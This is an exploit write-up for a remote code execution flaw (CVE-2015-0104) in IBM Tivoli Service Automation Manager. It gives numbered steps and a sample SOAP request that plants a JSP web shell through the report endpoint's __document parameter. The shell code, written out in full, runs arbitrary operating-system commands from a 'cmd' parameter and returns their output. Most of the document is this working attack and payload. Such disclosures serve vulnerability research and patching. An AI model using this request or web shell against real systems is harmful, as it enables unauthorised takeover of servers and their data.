# Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution # Date: 12\12\2014 # Exploit Author: Jakub Palaczynski # Vendor Homepage: http://www.ibm.com/ # Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4 # VU/CVE: VU#782708, CVE-2015-0104 1. Create report 2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=&appname=&__requestid=&reportNum= 3. Catch SOAP request generated by submitting form from previous step and inject JSP payload. Sample SOAP request: POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=&appname=&__requestid=&__sessionId= HTTP/1.1 Host: site Content-Length: xxx DocumentDocumentGetPagewhereaaaaaaaaaaaaaaaaaaaaaa <% try { String cmd; String[] cmdarr; String OS = System.getProperty("os.name"); if (request.getParameter("cmd") != null) { cmd = new String (request.getParameter("cmd")); if (OS.startsWith("Windows")) { cmdarr = new String [] {"cmd", "/C", cmd}; } else { cmdarr = new String [] {"/bin/sh", "-c", cmd}; } Process p = Runtime.getRuntime().exec(cmdarr); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } } catch (Exception e) { e.printStackTrace();} %>]]>aaaaaaaaaaaaaaaaaaaaaa__isdisplay__whereappnameAPPNAME__isdisplay__appnameAPPNAMEusepagebreakstrue__isdisplay__usepagebreakstrue__page1__svgtrue__page1__taskid 4. Web shell is now ready to use in path specified in __document parameter's value